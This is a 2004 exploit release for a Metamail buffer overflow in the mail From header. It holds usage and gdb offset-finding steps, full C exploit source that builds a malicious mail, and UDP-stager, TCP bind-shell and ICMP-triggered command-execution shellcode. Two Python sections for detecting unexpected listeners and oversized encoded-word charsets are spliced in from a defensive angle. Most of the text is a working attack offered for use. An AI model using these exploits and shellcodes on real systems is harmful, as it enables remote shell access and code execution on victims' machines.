Metamail Buffer Overflow Exploit(From Header)
Source: vfocus.net  Author: gloomy  Published: 2004-06-07

How to use this exploit?
This exploit targets the Metamail buffer overflow vulnerability. Thanks to Ulf Harnhammer for the proof of concept exploit. Compile it with:
- gcc metaexpl.c -o metaexpl

And launch it with
- ./metaexpl align retaddr

The output is a specially crafted mail. Pipe it to a file and launch Metamail.

Example:
- ./metaexpl 0 0x8054050 > mail
- metamail mail

If you have the correct align and return address, you should have an open UDP port at 13330. Search for it with:
- netstat --udp -a
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State
- udp 0 0 *:13330 *:*
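From the defender's side, the same netstat check can be automated: compare the listening sockets on a mail-handling host against a known baseline and report anything new, such as a UDP listener that a mail reader has no business opening. The Python below is an added example, not code from the original page; the baseline set and the netstat output it parses are constructed for illustration.

```python
"""Flag listening sockets that are not in a host's baseline.

Parses the text layout of `netstat --udp -a` / `netstat -a` shown on this page:
  Proto Recv-Q Send-Q Local Address Foreign Address State
UDP sockets have no State column; TCP sockets listen only when State is LISTEN.
"""

PROTOS = ("tcp", "tcp6", "udp", "udp6")

# Assumed baseline for a mail-handling host: (protocol, port) pairs that are
# expected to be listening.  Real deployments would load this from inventory.
BASELINE = {("tcp", 22), ("udp", 68), ("udp", 123)}

# Constructed sample output, shaped like the netstat listing on this page.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             10.0.0.9:51022          ESTABLISHED
udp        0      0 0.0.0.0:68              0.0.0.0:*
udp        0      0 *:13330                 *:*
"""


def parse_netstat(output):
    """Return one dict per socket row: proto, local_host, port, state."""
    sockets = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] not in PROTOS:
            continue  # banner, column header, or unix-domain rows
        host, _, port = parts[3].rpartition(":")  # handles "*:13330" and ":::123"
        if not port.isdigit():
            continue
        sockets.append({
            "proto": parts[0].rstrip("6"),        # fold tcp6/udp6 into tcp/udp
            "local_host": host,
            "port": int(port),
            "state": parts[5] if len(parts) > 5 else "",
        })
    return sockets


def unexpected_listeners(output, baseline=BASELINE):
    """(proto, port) pairs that are listening but absent from the baseline."""
    found = set()
    for sock in parse_netstat(output):
        listening = sock["proto"] == "udp" or sock["state"] == "LISTEN"
        if listening and (sock["proto"], sock["port"]) not in baseline:
            found.add((sock["proto"], sock["port"]))
    return sorted(found)


if __name__ == "__main__":
    for proto, port in unexpected_listeners(SAMPLE_NETSTAT):
        print("unexpected listener: %s/%d" % (proto, port))
```

On a live host, feed the function the captured output of `netstat -a` (or `ss -lun`, after adjusting the column parsing) and alert on a non-empty result; the established TCP session in the sample is deliberately ignored because only listeners matter for this check.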

Now you can send your shellcode to port 13330. priest added two shellcodes to my exploit: one binds a shell to TCP port 65535, the other uses ICMP and the ping utility to launch code. You can send it with:
- cat bindsockshc | netcat -u yourip 13330

Or
- cat icmpshc | netcat -u yourip 13330

If you use the bind shellcode, now telnet to the IP address on port 65535:
- telnet ipaddr 65535
- Trying ::1...
- telnet: connect to address ::1: Connection refused
- Trying 127.0.0.1...
- Connected to localhost.
- Escape character is '^]'.
- id;
- uid=100(hack) gid=100(users) groups=100(users)
- : command not found

For ICMP shellcode look at icmp.c file in this package.

How can I find the correct offset for other Linux distributions?
Align 0 and return address 0x8054050 work for German SUSE Linux 7.0. The known targets are in the file "targets" in this package. Please send me the targets of your Linux distributions. To exploit another distribution you need another align and return address. Launch the exploit with align 0 and any return address.

- ./metaexpl 1 0x41424344 > /tmp/mail

Now open gdb on the Metamail executable and run it with the mail as argument:

- gdb metamail
- (gdb)
- (gdb) r mail
- Starting program: /usr/bin/metamail mail

- Program received signal SIGSEGV, Segmentation fault.
- 0x68726979 in ?? ()

You have the wrong offset. Switch to another terminal and create a new mail with another offset. Positive and negative values are allowed.

- ./metaexpl 2 0x41424344 > /tmp/mail

Now in gdb:
- (gdb) r mail
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y
- Starting program: /usr/bin/metamail mail

- Program received signal SIGSEGV, Segmentation fault.
- 0x61626364 in ?? ()
- (gdb)

Now we have the correct offset (ABCD is normally \x41\x42\x43\x44 in hex, but Metamail adds 0x20 to it). Let's search for the return address (the return address is located on the heap):
- maintenance info sections
- ...
- 0x08053080->0x08053450 at 0x0000a080: .data ALLOC LOAD DATA HAS_CONTENTS
- 0x08053450->0x08053454 at 0x0000a450: .eh_frame ALLOC LOAD DATA HAS_CONTENTS
- 0x08053454->0x0805345c at 0x0000a454: .ctors ALLOC LOAD DATA HAS_CONTENTS
- 0x0805345c->0x08053464 at 0x0000a45c: .dtors ALLOC LOAD DATA HAS_CONTENTS
- 0x08053464->0x08053558 at 0x0000a464: .got ALLOC LOAD DATA HAS_CONTENTS
- 0x08053558->0x080535f8 at 0x0000a558: .dynamic ALLOC LOAD DATA HAS_CONTENTS
- 0x08053600->0x08053e50 at 0x0000a600: .bss ALLOC
- 0x00000000->0x0000017c at 0x0000a600: .comment READONLY HAS_CONTENTS
- 0x08053e50->0x08053f18 at 0x0000a77c: .note READONLY HAS_CONTENTS
- ^^^^^^^^^^

Now search for the NOPs (the heap starts after 0x08053f18):
- (gdb) x/1000x 0x08053f18
- 0x8053f18: 0x08053f68 0xffffffff 0xffffffff 0x00000000
- 0x8053f28: 0x00000000 0x00000000 0x00000000 0x00000000
- 0x8053f38: 0x00000000 0x00000000 0x00000000 0x00000000
- 0x8053f48: 0x00000000 0x00000000 0x00000000 0x00000000
- 0x8053f58: 0x00000000 0x00000000 0x00000000 0x400f5d80
- 0x8053f68: 0x00000000 0x00000000 0x00000000 0x00000000
- 0x8053f78: 0x00000000 0x00000000 0x00000000 0x000003f1
- 0x8053f88: 0x485f4d4d 0x45444145 0x0a3d5352 0x6d6f7246
- 0x8053f98: 0x3f3d203a 0x47474747 0x47474747 0x47474747
- 0x8053fa8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053fb8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053fc8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053fd8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053fe8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053ff8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8054008: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8054018: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8054028: 0x47474747 0x47474747 0x47474747 0x47474747
- ...

0x47474747 are the NOPs. All addresses filled with 0x47474747 are valid return addresses. Take an address in the middle of the NOP buffer; 0x8053fc8 is a good one, for example. Ok, we have our values. We can exploit it:
- metaexpl 2 0x8053fc8 > /tmp/mail
- metamail /tmp/mail
- netstat --udp -a
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State
- udp 0 0 *:13330 *:*

Exploit:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Standard buffer size for vuln buffer
#define STDBUFSIZ 560

// Udp Port 13330 for shellcode
#define PORT "\x34\x12"

#define NOP 'G'

// Shellcode, which waits for another shellcode on udp port PORT and
// launches it. Special thanks to:
// ** gunzip@ircnet <techieone@softhome.net>
// ** http://members.xoom.it/gunzip
// for his wonderful shellcode.

char shellcode[]=
"\x31\xc0\x31\xdb\x43\x50\x6a\x02\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x4b\x53\x53\x53\x66\x68" PORT "\x66\x6a\x02\x89\xe1\x6a\x16\x51"
"\x50\x89\xe1\xb3\x02\x6a\x66\x58\xcd\x80\x8b\x1c\x24\x99\x66\xba"
"\xff\xff\x29\xd4\x89\xe1\xb0\x03\xcd\x80\xff\xe1";

// Generate random nop data.
int gen_nops(char *buffer, int size)
{
    int i, num;
    FILE *file;

    // Open urandom for srandom
    file = fopen("/dev/urandom", "r");
    if(file == NULL)
        return -1;

    // Iterate size times
    for(i=0;i<size;i++)
    {
        // Read random data for srandom
        num = fgetc(file);

        // Set random number seed
        srandom(num);

        // Get random value
        num = random() % 26;

        // Add 65 ('A') so the buffer only contains upper-case letters.
        buffer[i] = 65 + num;
    }

    // close urandom
    fclose(file);

    return 0;
}

// Usage for wrong command line parameters
void usage(char *argv)
{
    printf("\n%s align retaddr\n", argv);
}

// Start of the exploit
int main(int argc, char **argv)
{
    char *buf;
    char *p;
    unsigned long retaddr;
    int align;

    if(argc != 3)
    {
        usage(argv[0]);
        exit(-1);
    }

    // Align and return address
    align = atoi(argv[1]);
    retaddr = strtoul(argv[2], 0, 0);

    // Get memory for our vuln buffer (one extra byte for the terminator)
    buf = (char*) malloc(STDBUFSIZ+align+2);
    if(buf == NULL)
        return 1;

    // Pointer to buf
    p = buf;

    // Set random nops (My last project. Use my function if you want,
    // to evade Intrusion detection systems). If you want the whitepaper
    // to the code, go to http://www.priestmaster.org/mypapers/nops.tgz
    // gen_nops(buf, STDBUFSIZ+align+1);
    memset(buf, NOP, STDBUFSIZ+align+1);

    // Copy the shellcode into the buffer
    memcpy(p+STDBUFSIZ-4-strlen(shellcode), shellcode, strlen(shellcode));

    // Set return address
    p += STDBUFSIZ+align-4;
    *((unsigned long *)p) = retaddr;

    // Null terminate
    buf[STDBUFSIZ+align+1] = 0;

    // Generate vuln mail
    // Change this to your values if you want.
    printf("From: =?");
    printf("%s?Q?test_?= <metaur@localhost>\n", buf);
    printf("To: <metaur@localhost>\n");
    printf("Subject: Testmail 3: Message for you\n");
    printf("MIME-Version: 1.0\n");
    printf("Content-Type: text/whatever\n\n");
    printf("Testmail 3");

    return 0;
}
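From the defensive side, the crafted message above carries its whole payload inside the charset field of an RFC 2047 encoded word, `=?<charset>?Q?...?=`, in the From header. The Python below is an added example (not code from the original page, the exploit's author, or Metamail): it unfolds a message's header block and flags encoded words whose charset token is implausibly long, consists of one repeated byte, or sits in a header carrying non-printable bytes, so a mail gateway or log pipeline can quarantine such messages before a vulnerable decoder sees them. The thresholds and the two constructed sample messages are assumptions chosen for illustration.

```python
"""Flag mail headers that look like RFC 2047 encoded-word overflow attempts."""
import re

# Assumed thresholds, chosen for illustration: RFC 2047 limits one encoded
# word to 75 characters, and registered charset names are far shorter than 40.
MAX_CHARSET_LEN = 40
MAX_ENCODED_WORD_LEN = 75
MAX_REPEAT_RUN = 32           # a long run of one byte looks like a NOP sled

# Well-formed encoded word: =?charset?Q|B?encoded-text?=
WELL_FORMED = re.compile(r"=\?([^?\s]+)\?([BbQq])\?([^?\s]*)\?=")


def unfold_headers(raw):
    """Return (name, value) pairs for the header block, joining folded lines."""
    pairs = []
    for line in raw.split("\n"):
        if line == "":                       # blank line ends the header block
            break
        if line[:1] in " \t" and pairs:      # continuation of the previous header
            name, value = pairs[-1]
            pairs[-1] = (name, value + " " + line.strip())
            continue
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs


def longest_run(s):
    """Length of the longest run of one repeated character in s."""
    best = run = 0
    for i, ch in enumerate(s):
        run = run + 1 if i and s[i - 1] == ch else 1
        best = max(best, run)
    return best


def scan_value(value):
    """Reasons why a header value looks like an encoded-word overflow attempt."""
    reasons = []
    if any(not 0x20 <= ord(c) < 0x7f for c in value):
        reasons.append("non-printable bytes in header value")
    pos = 0
    while True:                                # every "=?" opens a charset token
        start = value.find("=?", pos)
        if start < 0:
            break
        end = value.find("?", start + 2)       # charset ends at the next "?"
        charset = value[start + 2:end] if end >= 0 else value[start + 2:]
        if len(charset) > MAX_CHARSET_LEN:
            reasons.append("charset token of %d bytes" % len(charset))
        run = longest_run(charset)
        if run > MAX_REPEAT_RUN:
            reasons.append("repeated byte run of %d inside charset" % run)
        pos = start + 2
    for m in WELL_FORMED.finditer(value):     # syntactically valid but oversized
        if len(m.group(0)) > MAX_ENCODED_WORD_LEN:
            reasons.append("encoded word of %d bytes" % len(m.group(0)))
    return reasons


def scan_message(raw):
    """Return [(header_name, [reasons])] for every suspicious header."""
    alerts = []
    for name, value in unfold_headers(raw):
        reasons = scan_value(value)
        if reasons:
            alerts.append((name, reasons))
    return alerts


# Constructed benign message with ordinary encoded words.
BENIGN = ("From: =?ISO-8859-1?Q?J=F6rg_M=FCller?= <joerg@example.org>\n"
          "Subject: =?UTF-8?B?SGVsbG8=?=\n\nbody")


def build_sample():
    """Constructed message shaped like the crafted mail on this page: a From
    header whose charset is a long run of 'G', a few arbitrary high bytes
    standing in for a payload, and a 4-byte little-endian address."""
    fake_charset = "G" * 480 + "\xcc\xcc\xcc\xcc" + "\xc8\x3f\x05\x08"
    return ("From: =?" + fake_charset + "?Q?test_?= <metaur@localhost>\n"
            "To: <metaur@localhost>\n"
            "Subject: Testmail 3: Message for you\n"
            "MIME-Version: 1.0\n"
            "Content-Type: text/whatever\n\nTestmail 3")


if __name__ == "__main__":
    for label, msg in (("benign", BENIGN), ("crafted", build_sample())):
        print(label, scan_message(msg))
```

The charset scan deliberately does not rely on the strict regex alone: a payload that happens to contain a `?` byte (the sample address does) makes the encoded word malformed, so the loose `=?` scan is what catches it, while the strict pattern only adds the length check for well-formed words.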

bindsockshc.c:
/* Copyright (c) Ramon de Carvalho Valle July 2003 */
/* x86/linux bindsocketshellcode */

#include <stdio.h>

char shellcode[]= /* 72 bytes */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xf7\xe3" /* mull %ebx */
"\x53" /* pushl %ebx */
"\x43" /* incl %ebx */
"\x53" /* pushl %ebx */
"\x6a\x02" /* pushl $0x02 */
"\x89\xe1" /* movl %esp,%ecx */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\xff\x49\x02" /* decl 0x02(%ecx) */
"\x6a\x10" /* pushl $0x10 */
"\x51" /* pushl %ecx */
"\x50" /* pushl %eax */
"\x89\xe1" /* movl %esp,%ecx */
"\x43" /* incl %ebx */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\x89\x41\x04" /* movl %eax,0x04(%ecx) */
"\xb3\x04" /* movb $0x04,%bl */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\x43" /* incl %ebx */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\x59" /* popl %ecx */
"\x93" /* xchgl %eax,%ebx */
"\xb0\x3f" /* movb $0x3f,%al */
"\xcd\x80" /* int $0x80 */
"\x49" /* decl %ecx */
"\x79\xf9" /* jns <bindsocketshellcode+45> */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;

/* Test harness: jump into the shellcode buffer (build with gcc -m32 and an
   executable stack) */
int main(void)
{
    void (*dsr) ();
    dsr = (void (*)()) shellcode;
    printf("Size: %d bytes.\n", (int) sizeof(shellcode));
    dsr();
    return 0;
}

icmpshc.c:
/*
x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org

[example]

main:/home/gloomy/security/shellcode/linux/icmp# ./icmp
Size of shellcode = 137

main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost
PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)
34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
main:/home/gloomy/security/shellcode/linux/icmp# cat out
uid=0(root) gid=0(root) groups=0(root)
main:/home/gloomy/security/shellcode/linux/icmp#

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define SECRET_CHAR "\x99"

char shell[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x66"
"\x43\x41\x51\xb1\x03\x51\x49\x51"
"\x89\xe1\xcd\x80\x89\xc2\xb0\x02"
"\xcd\x80\x31\xdb\x39\xc3\x75\x55"
"\x31\xc0\x31\xdb\xb0\x10\x50\xb0"
"\xff\x54\x54\x53\x50\x55\x52\x89"
"\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"
"\xe9\x01\xc1\x31\xc0\x88\x41\xfe"
"\xb0\x25\x01\xc5\xb0" SECRET_CHAR
"\x32\x45\xff\x75\xd5\xb0\x02\xcd"
"\x80\x31\xdb\x39\xc3\x74\x25\xeb"
"\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"
"\x06\xcd\x80\x5b\x89\xd9\x88\x43"
"\x07\x80\xc1\x08\x50\x55\x51\x53"
"\x89\xe1\x99\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xcd\x80\xe8\xd8\xff\xff"
"\xff"
"/bin/sh -c";

/* Assembly source of the shell[] bytes above, as GAS inline asm (one string
   per line; a single multi-line string literal is not valid C).  Build with
   gcc -m32.  Labels carry a shc_ prefix so they cannot collide with the C
   library's exit() symbol. */
void asm_code() {
    __asm__(
    "    xorl %eax,%eax\n"
    "    xorl %ebx,%ebx\n"
    "    xorl %ecx,%ecx\n"
    "    movb $0x66,%al\n"
    "    incl %ebx\n"
    "    incl %ecx\n"
    "    push %ecx\n"
    "    movb $0x3,%cl\n"
    "    push %ecx\n"
    "    decl %ecx\n"
    "    push %ecx\n"
    "    movl %esp,%ecx\n"
    "    int $0x80\n"                 /* socket(); */
    "    movl %eax,%edx\n"

    "    movb $0x2,%al\n"
    "    int $0x80\n"                 /* fork(); */
    "    xorl %ebx,%ebx\n"
    "    cmpl %eax,%ebx\n"
    "    jne shc_exit\n"

    "shc_endlessloop:\n"
    "    xorl %eax,%eax\n"
    "    xorl %ebx,%ebx\n"
    "    movb $0x10,%al\n"
    "    push %eax\n"
    "    movb $0xff,%al\n"
    "    push %esp\n"
    "    push %esp\n"
    "    push %ebx\n"
    "    push %eax\n"
    "    push %ebp\n"
    "    push %edx\n"
    "    movl %esp,%ecx\n"
    "    movb $0x66,%al\n"
    "    movb $0x0c,%bl\n"
    "    int $0x80\n"                 /* recvfrom(); */

    "    movl %ebp,%ecx\n"
    "    addl %eax,%ecx\n"
    "    xorl %eax,%eax\n"
    "    movb %al,-2(%ecx)\n"
    "    movb $0x25,%al\n"
    "    addl %eax,%ebp\n"
    "    movb $0x99,%al\n"            /* SECRET_CHAR */
    "    xorb -1(%ebp),%al\n"
    "    jnz shc_endlessloop\n"

    "    movb $0x2,%al\n"
    "    int $0x80\n"                 /* fork(); */
    "    xorl %ebx,%ebx\n"
    "    cmpl %eax,%ebx\n"
    "    je shc_stack\n"
    "    jmp shc_endlessloop\n"
    "shc_execve:\n"
    "    xorl %eax,%eax\n"
    "    xorl %ebx,%ebx\n"
    "    movb $0x2,%bl\n"
    "    movb $0x6,%al\n"
    "    int $0x80\n"                 /* close(); */

    "    pop %ebx\n"
    "    movl %ebx,%ecx\n"
    "    movb %al,0x7(%ebx)\n"
    "    addb $0x8,%cl\n"
    "    push %eax\n"
    "    push %ebp\n"
    "    push %ecx\n"
    "    push %ebx\n"
    "    movl %esp,%ecx\n"
    "    cdq\n"
    "    movb $0xb,%al\n"
    "    int $0x80\n"                 /* execve(); */
    "shc_exit:\n"
    "    xorl %eax,%eax\n"
    "    incl %eax\n"
    "    int $0x80\n"                 /* exit(); */
    "shc_stack:\n"
    "    call shc_execve\n"
    "    .string \"/bin/sh -c\"\n"
    );
}


/* C equivalent of the shellcode's logic, for reference */
void c_code() {
    int fd;
    int nb = 0;
    struct sockaddr_in them;
    socklen_t them_size = sizeof(struct sockaddr);
    char buf[256];
    char *prog[] = {"/bin/sh","-c",&buf[37],NULL};

    fd = socket(2,3,1);                 /* raw ICMP socket */
    if (fork() > 0) exit(0);
    while (1) {
        while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));
        buf[nb-1] = 0;
        /* first byte of the ping payload must equal SECRET_CHAR */
        if (buf[36] == SECRET_CHAR[0])
            if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }
    }
}

int main(int c,char *v[]) {
    void (*i)();
    (void)c; (void)v;
    i = (void (*)())shell;
    fprintf(stderr,"Size of shellcode = %d\n\n",(int)strlen(shell));
    i();
    return 0;
}
